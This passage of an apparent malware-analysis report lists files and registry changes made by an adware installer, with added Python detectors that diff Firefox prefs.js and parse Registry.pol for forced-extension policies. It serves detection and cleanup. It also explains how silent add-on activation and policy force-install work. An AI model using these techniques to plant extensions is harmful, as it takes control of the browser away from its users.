%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\he\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ta\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\background.xul (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\be\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons\icon64.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es_419\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sq\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\he (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ro\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sw\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\nl\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hu (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\styles.css (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\bootstrap.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_TW (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ca\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\gu (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\el\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\te (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ja\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bg\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_BR (0 bytes)
%Program Files%\thzXuJvjUgjghbrkfyg\ZzB5QsG.dll (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ru\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mk\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fil (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\de\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\vi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_PT\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fa (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ko\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_BR\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\cs\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fil\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bn\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\no (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\nl (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sk\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\bindings.css (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_CN\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_GB\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files\main.css (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\el (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\uk (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\et (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\Kernel.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\no\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\da\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ms (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ms\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\te\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\install.rdf (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\tr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sl\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mk (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\th (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files\background.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ml (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\et\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\uk\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ta (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\tr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\de (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\da (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fi\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hi\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\it\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ml\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ru (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\th\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ar\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sq (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fa\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sw (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sv (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lt (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lv (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sl (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\bindings.xml (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\am\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ro (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files\foreground.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ca (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\gu\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons\icon48.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\cs (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons\icon19.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_CN (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_TW\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ko (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\kn (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_US\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\background.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_US (0 bytes)
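
ytab_m_1_big.exe:3664 deletes the Firefox profile's prefs.js and writes a replacement through prefs.js_temp while staging a bootstrapped extension (install.rdf, bootstrap.js, chrome.manifest) under the application directory in browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}. An add-on dropped into that scope only activates silently if the profile's preferences allow it, so comparing the rewritten prefs.js with a known-good copy is the quickest way to see what the installer changed. The example below is added here and is not part of the Lavasoft report or the sample: it parses user_pref() lines and reports watched preferences that changed, plus any newly added extensions.* preference. The before/after contents are constructed; the report does not show what the rewritten prefs.js contained, and the search URL is a placeholder.

```python
import re

# One user_pref("name", value); line as Firefox writes it. Values are a quoted
# string, an integer, or true/false.
_PREF_RE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)*)",\s*(.*?)\);\s*$')

# Prefs that browser hijackers and side-loading installers commonly rewrite.
# extensions.autoDisableScopes defaults to 15 (every unsolicited install scope
# is disabled until the user confirms); 0 lets an add-on dropped into the
# application or system scope activate without a prompt.
WATCHED = (
    "extensions.autoDisableScopes",
    "extensions.enabledScopes",
    "browser.startup.homepage",
    "browser.search.defaultenginename",
    "browser.newtab.url",
    "keyword.URL",
)


def _unquote(raw):
    return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")


def parse_prefs(text):
    """Return {pref_name: value} from the user_pref() lines of a prefs.js."""
    prefs = {}
    for line in text.splitlines():
        m = _PREF_RE.match(line)
        if not m:
            continue                     # comments, blank lines, anything else
        name, raw = m.group(1), m.group(2).strip()
        if raw.startswith('"') and raw.endswith('"'):
            prefs[name] = _unquote(raw)
        elif raw in ("true", "false"):
            prefs[name] = raw == "true"
        else:
            try:
                prefs[name] = int(raw)
            except ValueError:
                prefs[name] = raw        # leave anything unexpected verbatim
    return prefs


def pref_changes(before, after):
    """{name: (old, new)} for watched prefs that changed, plus any newly added
    extensions.* pref (for example a distribution add-on marker for a dropped GUID)."""
    changes = {}
    for name in sorted(set(before) | set(after)):
        interesting = name in WATCHED or (name.startswith("extensions.") and name not in before)
        if interesting and before.get(name) != after.get(name):
            changes[name] = (before.get(name), after.get(name))
    return changes


# Constructed samples: the report shows prefs.js being deleted and rewritten
# (13017 bytes via prefs.js_temp), not its contents. The GUID reused below is
# the features-directory name from this report; the URL is a placeholder.
PREFS_BEFORE = """# Mozilla User Preferences
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.shell.checkDefaultBrowser", false);
user_pref("extensions.enabledScopes", 5);
"""
PREFS_AFTER = """# Mozilla User Preferences
user_pref("browser.startup.homepage", "http://search.example.invalid/?q=");
user_pref("browser.shell.checkDefaultBrowser", false);
user_pref("extensions.enabledScopes", 5);
user_pref("extensions.autoDisableScopes", 0);
user_pref("extensions.installedDistroAddon.{5C3FD6D1-9185-4195-B5E1-FAB622427F59}", true);
"""

if __name__ == "__main__":
    for name, (old, new) in pref_changes(parse_prefs(PREFS_BEFORE), parse_prefs(PREFS_AFTER)).items():
        print("%s: %r -> %r" % (name, old, new))
```

Firefox rewrites prefs.js itself on exit, so compare against a copy taken before the infection window (or a backup) rather than a current one; a prefs.js that sets extensions.autoDisableScopes to 0 next to a fresh directory under browser\features is the combination to look for.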

The process ytab_m_1_big.exe:2980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\GroupPolicy\gpt.ini (268 bytes)
C:\Windows\System32\GroupPolicy\Machine\Registry.pol (2 bytes)
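
The second ytab_m_1_big.exe instance writes to the machine Group Policy store: Registry.pol holds registry settings applied as policy, and gpt.ini carries the version counter that tells the policy engine the settings changed and must be re-applied. Writing there is how an installer can force-install a browser extension through a policy such as Chrome's ExtensionInstallForcelist, which the browser then treats as administrator-mandated and will not let the user remove. The report records only a 2-byte write, smaller than the 8-byte Registry.pol header, so the captured content is not a complete policy file and its contents are unknown. The following added example, not from the Lavasoft report or the sample, builds a constructed Registry.pol (reusing the Chrome extension ID seen earlier on this page purely as sample data) and parses it according to the MS-GPREG layout, then flags entries under force-install policy keys.

```python
import struct

# Registry value types decoded here (others are returned as raw bytes).
REG_SZ = 1
REG_DWORD = 4

# Policy keys (relative to HKLM) through which a machine-wide Registry.pol can
# force-install browser extensions.
FORCE_INSTALL_KEYS = (
    "Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist",
    "Software\\Policies\\Mozilla\\Firefox\\Extensions\\Install",
)
_FORCE_LOWER = {k.lower() for k in FORCE_INSTALL_KEYS}


def _wchar(ch):
    return ch.encode("utf-16-le")


def build_registry_pol(entries):
    """Serialize (key, value, type, data_bytes) tuples into the MS-GPREG layout:
    'PReg' + version 1, then [key;value;type;size;data] records whose
    delimiters, key and value are UTF-16LE. Used here only to build the sample."""
    blob = b"PReg" + struct.pack("<I", 1)
    for key, value, rtype, data in entries:
        blob += _wchar("[") + key.encode("utf-16-le") + b"\x00\x00"
        blob += _wchar(";") + value.encode("utf-16-le") + b"\x00\x00"
        blob += _wchar(";") + struct.pack("<I", rtype)
        blob += _wchar(";") + struct.pack("<I", len(data))
        blob += _wchar(";") + data + _wchar("]")
    return blob


def _read_wstr(blob, pos):
    """Read a NUL-terminated UTF-16LE string starting at pos (2-byte aligned)."""
    end = pos
    while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 2 > len(blob):
        raise ValueError("unterminated string at offset %d" % pos)
    return blob[pos:end].decode("utf-16-le"), end + 2


def _expect(blob, pos, ch):
    if blob[pos:pos + 2] != _wchar(ch):
        raise ValueError("expected %r at offset %d" % (ch, pos))
    return pos + 2


def _decode(rtype, data):
    if rtype == REG_SZ:
        return data.decode("utf-16-le").rstrip("\x00")
    if rtype == REG_DWORD and len(data) == 4:
        return struct.unpack("<I", data)[0]
    return data


def parse_registry_pol(blob):
    """Parse a Registry.pol blob into (key, value, type, decoded_data) tuples."""
    if blob[:4] != b"PReg" or struct.unpack_from("<I", blob, 4)[0] != 1:
        raise ValueError("not a version-1 Registry.pol file")
    pos, entries = 8, []
    while pos < len(blob):
        pos = _expect(blob, pos, "[")
        key, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ";")
        value, pos = _read_wstr(blob, pos)
        pos = _expect(blob, pos, ";")
        rtype = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        size = struct.unpack_from("<I", blob, pos)[0]
        pos = _expect(blob, pos + 4, ";")
        data = blob[pos:pos + size]
        pos = _expect(blob, pos + size, "]")
        entries.append((key, value, rtype, _decode(rtype, data)))
    return entries


def forced_extensions(entries):
    """Return [(key, value_name, data)] for entries under a force-install policy key."""
    return [(key, value, data) for key, value, _rtype, data in entries
            if key.lower() in _FORCE_LOWER]


# Constructed sample: the report only records that Registry.pol was written,
# not its contents. The extension ID is the Chrome extension directory name
# seen earlier in this report; the update URL is Chrome's standard one.
SAMPLE_POL = build_registry_pol([
    ("Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist", "1", REG_SZ,
     "cmhomipkklckpomafalojobppmmidlgl;https://clients2.google.com/service/update2/crx\x00"
     .encode("utf-16-le")),
    ("Software\\Policies\\Google\\Chrome", "DeveloperToolsDisabled", REG_DWORD,
     struct.pack("<I", 1)),
])

if __name__ == "__main__":
    for key, value, data in forced_extensions(parse_registry_pol(SAMPLE_POL)):
        print("forced extension: %s\\%s = %s" % (key, value, data))
```

Run parse_registry_pol over the real C:\Windows\System32\GroupPolicy\Machine\Registry.pol to see every policy the installer planted; User\Registry.pol uses the same layout. A machine on which local policy has never been edited does not normally have this file at all, so its mere presence next to the dropped files above is worth a look, and removing the dropped extension without also removing the policy entry only has the browser reinstall it.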

Registry activity

The process brastub6ab_amobl_inst.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"ConsoleTracingMask" = "4294901760"

"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD]
"Blob" = "0F 00 00 00 01 00 00 00 20 00 00 00 52 29 BA 15"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"FileDirectory" = "%windir%\tracing"

